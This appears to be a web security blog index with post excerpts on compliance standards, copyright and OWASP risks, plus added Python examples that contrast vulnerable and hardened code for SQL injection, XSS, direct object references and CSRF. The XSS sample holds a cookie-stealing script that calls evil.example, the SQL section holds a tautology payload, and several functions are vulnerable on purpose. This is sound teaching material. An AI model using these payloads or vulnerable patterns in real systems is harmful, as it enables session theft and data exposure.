
The Copyright Act by default gives the content owner the legal right to restrict or authorize the reuse of copyright-protected material. Although the owner has exclusive rights over the content, copyright is still subject to certain limitations, as defined in sections 107 through 118 of the copyright law (title 17, U.S. Code).

WordPress is well organized from a usability perspective, and most known vulnerabilities are fixed in a timely manner. Keeping WordPress updated through the admin panel is a one-click process, but many external factors still influence the overall security of a WordPress site. Let's walk through the generic security guidelines and look at a few configuration settings to lock down WordPress.

As part of an SEO strategy we consider how search engines work, what people search for, the relevance of the search terms or keywords typed into search engines, and which search engines the target audience prefers. Improving site ranking is a gradual process of generating authentic content, identifying relevant keywords and using them effectively while building new content, promoting the site using backlinks or inbound links, and remov...

A list of security testing tools that can be used for auditing and scanning a web site. A few of them are available as open source as part of the OWASP project.

PCI DSS (Payment Card Industry Data Security Standard) was defined by the Payment Card Industry Security Standards Council to increase controls around cardholder data and to reduce credit card fraud. Compliance can be verified by an external Qualified Security Assessor (QSA) or, for companies handling a smaller volume of transactions, by a Self-Assessment Questionnaire (SAQ).

The Data Protection Act 1998 requires every data controller who is processing personal information in an automated form to notify, unless they are exempt. Failure to notify is a criminal offence. Register entries have to be renewed annually. If you are required to notify but don’t renew your registration, you are committing a criminal offence.

The following are the key meta tags and best practices for secure HTML generation, which make the best use of browser-specific security features and make the client-side environment more secure. Most of the settings are minor server-side tweaks to correctly generate security-sensitive meta tags or to handle other client-side elements, such as cookies and cache, properly.
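The following is an added example, not code from the original page: it emits the response headers and cookie attributes such a checklist covers, renders the subset that browsers honour as meta tags, and audits a response for what is missing. The header values and the choice of headers are assumptions for illustration; in particular, X-Frame-Options and Strict-Transport-Security are only honoured as real HTTP headers, never as meta tags.

```python
import html

# Assumed baseline set of response headers for an authenticated web page
# (illustrative values, not a recommendation from the original page).
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Cache-Control": "no-store",  # keep authenticated pages out of shared caches
}

# Browsers accept CSP as <meta http-equiv>; X-Frame-Options and HSTS are
# silently ignored in meta form and must be sent as HTTP headers.
META_CAPABLE = {"Content-Security-Policy"}


def render_meta_tags(headers=SECURITY_HEADERS):
    """Render only the headers that browsers honour as meta tags."""
    return "\n".join(
        f'<meta http-equiv="{name}" content="{html.escape(value, quote=True)}">'
        for name, value in headers.items()
        if name in META_CAPABLE
    )


def build_session_cookie(name, value):
    """Set-Cookie value for a session cookie: not sent over plain HTTP (Secure),
    not readable from script (HttpOnly), not attached to cross-site requests
    (SameSite)."""
    return f"{name}={value}; Secure; HttpOnly; SameSite=Lax; Path=/"


def missing_cookie_flags(set_cookie):
    """Return the protective attributes absent from a Set-Cookie header value."""
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie.split(";")[1:]}
    return [flag for flag in ("Secure", "HttpOnly", "SameSite")
            if flag.lower() not in attrs]


def missing_headers(response_headers):
    """Return the baseline headers a response does not carry (names are
    case-insensitive in HTTP, so compare lower-cased)."""
    present = {k.lower() for k in response_headers}
    return [h for h in SECURITY_HEADERS if h.lower() not in present]


if __name__ == "__main__":
    print(render_meta_tags())
    print(build_session_cookie("sid", "3f9c1a"))
    print(missing_cookie_flags("sid=3f9c1a; Path=/"))
    print(missing_headers({"Content-Type": "text/html"}))
```

The audit helpers are the useful part for a review: run `missing_headers` and `missing_cookie_flags` over the headers a real response returns and the output is the list of gaps to fix on the server side.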

SQL injection is used by malicious users to attack your application surface through legitimate-looking input, exploiting weaknesses in the coding pattern, especially in how the application interacts with the database. The purpose of the attack may be to gain unauthorized access to sensitive data, especially that of other users and accounts. In some cases, if such a vulnerability exists, then using attacks like command injection the attacker may tak...
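An added example (not from the original page) showing the coding-pattern weakness the paragraph describes and its fix, against a constructed in-memory SQLite table: the vulnerable lookup splices the user's input into the SQL text, so a tautology in the input returns every account, while the parameterized version sends the value separately and compares it only as data. Table and row contents are made up for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the application's account table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [(1, "alice", 500), (2, "bob", 1200), (3, "carol", 80)],
    )
    return conn


def lookup_vulnerable(conn, owner):
    """Vulnerable: the input becomes part of the SQL statement, so a quote
    closes the literal and whatever follows is parsed as SQL."""
    sql = "SELECT owner, balance FROM accounts WHERE owner = '" + owner + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, owner):
    """Hardened: the statement text is fixed; the driver binds the value
    separately, so quotes or keywords in it are never interpreted."""
    return conn.execute(
        "SELECT owner, balance FROM accounts WHERE owner = ?", (owner,)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    # Tautology payload: WHERE owner = 'x' OR '1'='1' matches every row.
    payload = "x' OR '1'='1"
    print(lookup_vulnerable(conn, payload))      # all three accounts leak
    print(lookup_parameterized(conn, payload))   # [] : no owner has that literal name
```

Note that Python's `sqlite3.execute` refuses to run more than one statement per call, so stacked queries (`'; DROP TABLE ...`) fail here even in the vulnerable version; other drivers and databases do allow them, so the fix is parameterization, not reliance on that behaviour.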

Cross-Site Scripting (XSS) is the act of injecting malicious script or other HTML code into a web page so that it runs in the client browser and causes damage to your web site's users. It mostly relies on trusted user input (e.g. feedback comments): when such input is rendered as part of the page HTML without validating or encoding the user-provided content, every other user who visits the page may become a victim of the XSS attack.
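An added example, not code from the original page, of the stored-comment case the paragraph describes: constructed comment submissions are rendered once by string concatenation (the script tag survives and would execute for every visitor) and once through output encoding for the HTML element and attribute contexts, where the same input comes out as inert text. The comment strings are made up for the demonstration.

```python
import html

# Constructed submissions standing in for untrusted "feedback comment" input.
COMMENTS = [
    "Great article!",
    '<script>document.location="http://evil.example/?c="+document.cookie</script>',
    '" onmouseover="alert(1)',
]


def render_unsafe(comment):
    """Vulnerable: untrusted text is concatenated straight into the HTML,
    so markup inside it becomes markup of the page."""
    return "<li>" + comment + "</li>"


def render_escaped(comment):
    """Hardened for an element (text) context: <, >, &, " and ' are encoded,
    so the browser shows the characters instead of parsing them."""
    return "<li>" + html.escape(comment, quote=True) + "</li>"


def render_attribute(value):
    """Attribute context: encode AND quote the attribute. Without the quotes,
    a payload such as `" onmouseover="alert(1)` still breaks out."""
    return '<input type="text" value="' + html.escape(value, quote=True) + '">'


def render_page(comments, renderer=render_escaped):
    """Assemble the comment list with the chosen renderer."""
    return "<ul>" + "".join(renderer(c) for c in comments) + "</ul>"


if __name__ == "__main__":
    print(render_page(COMMENTS, render_unsafe))   # script tag reaches the browser
    print(render_page(COMMENTS))                  # &lt;script&gt; ... rendered as text
    print(render_attribute(COMMENTS[2]))
```

HTML entity encoding is the right encoder only for HTML element and quoted-attribute contexts; data placed inside a `<script>` block, a URL, or a CSS value needs the encoder for that context, and input validation on the way in (the page's "validating the user provided contents") is a second layer, not a replacement for encoding on the way out.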

Threat modeling is a risk analysis exercise that can be applied not only to a software product but to any asset that is valuable to your organization.

This is an iterative exercise, and it may not be possible to ensure 100% coverage or to get it 100% correct on the first pass. Ideally you should start by protecting the outer trust boundary and then continue securing the internal layers and sub-components of your application.


Copyright And Plagiarism


The Safe Harbor provision of the DMCA (Digital Millennium Copyright Act) protects online service providers such as ISPs and search engines, and content providers such as YouTube, from copyright infringement liability, provided they meet the specific guidelines defined under the Online Copyright Infringement Liability Limitation Act ("OCILLA"), DMCA Title II. The primary objective of the Safe Harbor provision is to protect such service provid...

Many tools and online services now maintain huge repositories of published content, including books. Most of these are paid services but may be very useful for publishers and content writers who produce original content for financial purposes. It is also possible to use a search engine such as Google to search for duplicate content manually, which may produce more accurate results but may involve too much effort.

In non-technical terms, plagiarism is the act of stealing credit for work done by others: producing new content that is taken directly from another's work, in whole or in part, or taking the core material of another's work and reproducing it with restructuring or rephrasing, without giving credit to the original author. Plagiarism is by nature considered unethical but not defined as l...

Copyright is legal protection provided by U.S. law (title 17) to the authors of "original works of authorship", including literary, dramatic, musical, artistic, and certain other intellectual works. Copyright law protects both published and unpublished works, provided you can prove that you are the original author of the work/content.


Cyber Security Compliance Standards


Collectively the ISO 27000 series consists of a core set of standards (ISO 27001 through 27010), each focusing on a specific function. In addition, six further standards are defined to focus on related domains, e.g. telecom, BCP, and network and application security.

The United States Department of Defense (DoD) introduced the DoD Information Assurance Certification and Accreditation Process (DIACAP) as a risk management standard to apply to Department of Defense information systems. DIACAP defines a set of activities and a structured process for the certification and accreditation (C&A) of DoD information systems, applied throughout the system's life cycle.

Where to use COBIT Framework?
COBIT may be evaluated in two different contexts. It provides a generic process framework that can be used to comply with global standards like SOX, ISO 27001, ITIL or PMBOK. At the same time the COBIT framework defines a very specific and detailed framework to plan, execute, control and measure all IT-enabled initiatives and services in your organization. Many organizations have been using COBIT...

What is HIPAA and Privacy & Security Rules?
HIPAA is the Health Insurance Portability and Accountability Act. The U.S. Department of Health & Human Services (HHS) published the HIPAA Privacy Rule and the HIPAA Security Rule to define regulatory standards for protecting the privacy and security of health information.

Federal Information Security Management Act (FISMA) is part of the E-Government Act (Title III) that requires each U.S. federal agency to develop, document, and implement an agency-wide program to provide information security for the information and information systems that support the operations and assets of the agency, including those provided or managed by another agency, contractor, or other source.

Statement on Auditing Standards No. 70: Service Organizations, commonly abbreviated as SAS 70 is an auditing statement issued by the Auditing Standards Board of the American Institute of Certified Public Accountants (AICPA) with its content codified as AU 324. SAS 70 provides guidance to service auditors when assessing the internal control of a service organization and issuing a service auditor’s report. SAS 70 also provides guidance to auditors ...

The Sarbanes-Oxley Act (SOX) is United States legislation enacted in response to high-profile financial scandals to protect shareholders and the general public from accounting errors and fraudulent practices in the enterprise. The act contains 11 titles, or sections, ranging from additional corporate board responsibilities to criminal penalties, and requires the Securities and Exchange Commission (SEC) to implement rulings on requirement...


Web Application Security


Broken Authentication and Session Management – OWASP definition

"Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities."

Insecure Direct Object References are flaws in system design where access to sensitive data/assets is not fully protected and data objects are exposed by the application on the assumption that the user will always follow the application's rules. For example, take a scenario where a financial data report is displayed to a user who is authorized to see his own personal/organization's financial report but is not expected to see other users'/organ...
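An added example, not from the original page, built around the financial-report scenario above with a constructed report store: the vulnerable handler trusts the report id from the request because the user is authenticated, the hardened handler scopes the lookup to the caller's organization and gives the same refusal for "missing" and "not yours" so the endpoint cannot be used to enumerate valid ids, and `AccessReferenceMap` shows the indirect-reference alternative where the client only ever sees per-session random tokens. Ids, organizations and report bodies are assumptions for illustration.

```python
import secrets

# Constructed report store: report id -> (owning organization, report body).
REPORTS = {
    1001: ("acme", "ACME Q1 financial report"),
    1002: ("globex", "Globex Q1 financial report"),
}


class Forbidden(Exception):
    """Raised when the caller may not access the requested object."""


def get_report_vulnerable(report_id, user):
    """Vulnerable: the id from the URL (e.g. /report?id=1002) is used as-is.
    Authentication happened, authorization did not, so changing the id
    reads another organization's report."""
    return REPORTS[report_id][1]


def get_report_checked(report_id, user):
    """Hardened: the lookup is scoped to the caller's organization. A missing
    id and a foreign id get the same answer, so probing ids reveals nothing."""
    record = REPORTS.get(report_id)
    if record is None or record[0] != user["org"]:
        raise Forbidden(report_id)
    return record[1]


class AccessReferenceMap:
    """Per-session indirect references: the client is handed random tokens in
    place of database ids, and a token resolves only inside the session that
    issued it, so there is no id to tamper with in the first place."""

    def __init__(self, direct_ids):
        self._to_direct = {}
        self._to_indirect = {}
        for direct in direct_ids:
            token = secrets.token_urlsafe(8)
            self._to_direct[token] = direct
            self._to_indirect[direct] = token

    def indirect(self, direct_id):
        return self._to_indirect[direct_id]

    def direct(self, token):
        if token not in self._to_direct:
            raise Forbidden(token)
        return self._to_direct[token]


def is_forbidden(fn, *args):
    """True if fn(*args) raises Forbidden; lets callers check refusals as a value."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice = {"name": "alice", "org": "acme"}
    print(get_report_vulnerable(1002, alice))          # Globex data leaks to ACME's user
    print(is_forbidden(get_report_checked, 1002, alice))  # True
    refs = AccessReferenceMap([1001])
    token = refs.indirect(1001)                         # what alice's page links to
    print(get_report_checked(refs.direct(token), alice))
```

The ownership check is the essential fix; the indirect map is a defence in depth that also stops id enumeration, and the two are normally combined rather than used alone.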

Cross-Site Request Forgery (CSRF) is a way to perform a malicious action by tricking a legitimate web site user's browser into sending a malicious request to the web server under that user's valid session context. Because the request originates under a valid user context, the web server fails to detect the malicious intent and executes the request with full trust, allowing the attacker to exploit any weakness in the server-side environment.
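An added example, not code from the original page, of a funds-transfer action with and without CSRF protection. Requests are modelled as dictionaries: a forged request carries the victim's session (the browser attached the cookie) but no token, and is accepted by the unprotected handler and refused by the protected one; the token is an HMAC over the session id under a server key, so an attacker's page cannot compute it and a token captured from one session does not validate in another. The request shape, field names and key handling are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret; a deployment would load this from configuration.
SERVER_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id):
    """Token bound to the session: unguessable without SERVER_KEY and useless
    if replayed against a different session. Embed it in the form as a hidden
    field; the same-origin policy stops a hostile page reading it."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id, submitted):
    """Constant-time comparison so the check does not leak the token byte by byte."""
    if not submitted:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)


def transfer_unprotected(request):
    """Vulnerable: the session cookie alone authorises the action. A hostile
    page can make the victim's browser submit this form and the cookie rides along."""
    form = request["form"]
    return ("ok", f"moved {form['amount']} to {form['to']}")


def transfer_protected(request):
    """Hardened: state changes only via POST, and only with a token that the
    attacker's page could not have obtained."""
    if request["method"] != "POST":
        return ("forbidden", "state change requires POST")
    form = request["form"]
    if not verify_csrf_token(request["session"], form.get("csrf_token")):
        return ("forbidden", "missing or invalid CSRF token")
    return ("ok", f"moved {form['amount']} to {form['to']}")


if __name__ == "__main__":
    sid = "sess-7f3a"
    # Forged: the victim's session is present, the token is not.
    forged = {"session": sid, "method": "POST",
              "form": {"to": "mallory", "amount": 1000}}
    print(transfer_unprotected(forged))   # ('ok', ...)  the attack succeeds
    print(transfer_protected(forged))     # ('forbidden', ...)
    # Legitimate: the form rendered for this session carried its token.
    legit = {"session": sid, "method": "POST",
             "form": {"to": "bob", "amount": 50, "csrf_token": issue_csrf_token(sid)}}
    print(transfer_protected(legit))      # ('ok', ...)
```

Marking the session cookie `SameSite=Lax` or `Strict` stops the browser attaching it to most cross-site requests and is a worthwhile second layer, but the per-session token remains the check the server can rely on.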

The Microsoft Security Assessment Tool (MSAT) is a risk-assessment application designed to provide information and recommendations about best practices for security within an information technology (IT) infrastructure.

UrlScan works as an ISAPI filter on Microsoft Internet Information Services (IIS) and protects IIS by restricting malicious HTTP requests. When properly configured, UrlScan is effective at reducing the exposure of IIS to potential Internet attacks.

Overview
ModSecurity is a web application firewall engine that provides very little protection on its own. In order to become useful, ModSecurity must be configured with rules. In order to enable users to take full advantage of ModSecurity out of the box, Trustwave’s SpiderLabs is providing a free certified rule set for ModSecurity 2.x. Unlike intrusion detection and prevention systems, which rely on signatures specific to ...

The OWASP AntiSamy project is available in versions for Java & .Net respectively. It’s an API that helps you make sure that clients do not supply malicious cargo code in the HTML they supply for their profile, comments, etc. that gets persisted on the server.

ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications.

Overview
The Microsoft Baseline Security Analyzer (MBSA) provides a streamlined method to identify missing security updates and common security misconfigurations.
To easily assess the security state of Windows machines, Microsoft offers the free MBSA scan tool. MBSA includes a graphical and command line interface that can perform local or remote scans of Microsoft Windows systems.

About OWASP Top 10 Project
The OWASP Top 10 project was launched in 2003 to identify the top security risks and vulnerabilities associated with web applications. The outcome of the project is a list of the ten threats and vulnerabilities found most commonly across the globe. The Top 10 project is now referenced by many organizations and compliance groups, including MITRE, PCI DSS, DISA and the FTC. The latest version was released in 2010...

The section below lists the common attacks applicable to most web applications, which must be considered. For a business-critical application the checks and balances should be much more exhaustive; these can be identified with a formal threat modeling exercise.

DREAD is a risk rating model used in threat modeling exercises.
Using the DREAD risk rating model along with the STRIDE model can be very helpful in understanding the influence of a threat and in prioritizing threats based on the risk value the DREAD model assigns to each one.

The STRIDE model is recommended by Microsoft for analyzing web application threats by allocating each threat to one of six categories. The STRIDE model and data flow diagrams can be used very effectively during a threat modeling exercise.
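An added example (not from the original page) serving both the DREAD and STRIDE paragraphs above: each threat is tagged with one of the six STRIDE categories and rated on the five DREAD factors (Damage, Reproducibility, Exploitability, Affected users, Discoverability) on a 1 to 10 scale, the DREAD score is the mean of the five, and the list is sorted by that score to give the implementation priority. The sample threats, their ratings and the High/Medium/Low bands are assumptions for illustration; DREAD itself fixes no thresholds.

```python
from dataclasses import dataclass

# The six STRIDE categories each threat is allocated to.
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}


@dataclass
class Threat:
    name: str
    stride: str              # one STRIDE letter
    damage: int              # D: how bad is the impact?
    reproducibility: int     # R: how reliably does the attack work?
    exploitability: int      # E: how little skill/effort does it need?
    affected_users: int      # A: how many users are hit?
    discoverability: int     # D: how easy is the weakness to find?

    def __post_init__(self):
        if self.stride not in STRIDE:
            raise ValueError(f"unknown STRIDE category: {self.stride!r}")
        for rating in self.ratings():
            if not 1 <= rating <= 10:
                raise ValueError(f"rating out of range for {self.name!r}: {rating}")

    def ratings(self):
        return (self.damage, self.reproducibility, self.exploitability,
                self.affected_users, self.discoverability)

    def dread_score(self):
        """Arithmetic mean of the five 1-10 ratings."""
        return sum(self.ratings()) / 5


def risk_band(score):
    """Assumed banding for illustration (not part of the DREAD model itself)."""
    if score >= 7:
        return "High"
    if score >= 4:
        return "Medium"
    return "Low"


def prioritize(threats):
    """Highest DREAD score first; this ordering is the implementation priority."""
    return sorted(threats, key=lambda t: t.dread_score(), reverse=True)


# Constructed threats for a small web application, with assumed ratings.
SAMPLE_THREATS = [
    Threat("Predictable session token lets an attacker impersonate users", "S", 8, 9, 7, 8, 6),
    Threat("Stored XSS in feedback comments", "T", 7, 10, 8, 9, 9),
    Threat("Audit log entries can be forged by the user", "R", 4, 6, 5, 3, 4),
    Threat("Sequential report ids expose other tenants' data", "I", 6, 10, 9, 7, 8),
]


if __name__ == "__main__":
    for t in prioritize(SAMPLE_THREATS):
        score = t.dread_score()
        print(f"{score:4.1f} {risk_band(score):6s} {STRIDE[t.stride]:22s} {t.name}")
```

Ratings are subjective, so the value of the exercise comes from rating all threats with the same rubric in one sitting and recording why each number was chosen; the ordering, not the absolute score, is what drives the implementation scope.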

Data flow diagrams can be used effectively during a threat modeling exercise. We first create high-level DFDs and then break them down further to clarify the context.

Think of threat modeling as the process of understanding which assets you need to protect, from whom you need to protect them, how you protect them, what the implementation priority is, and what risk you accept if some threats are left out of the implementation scope.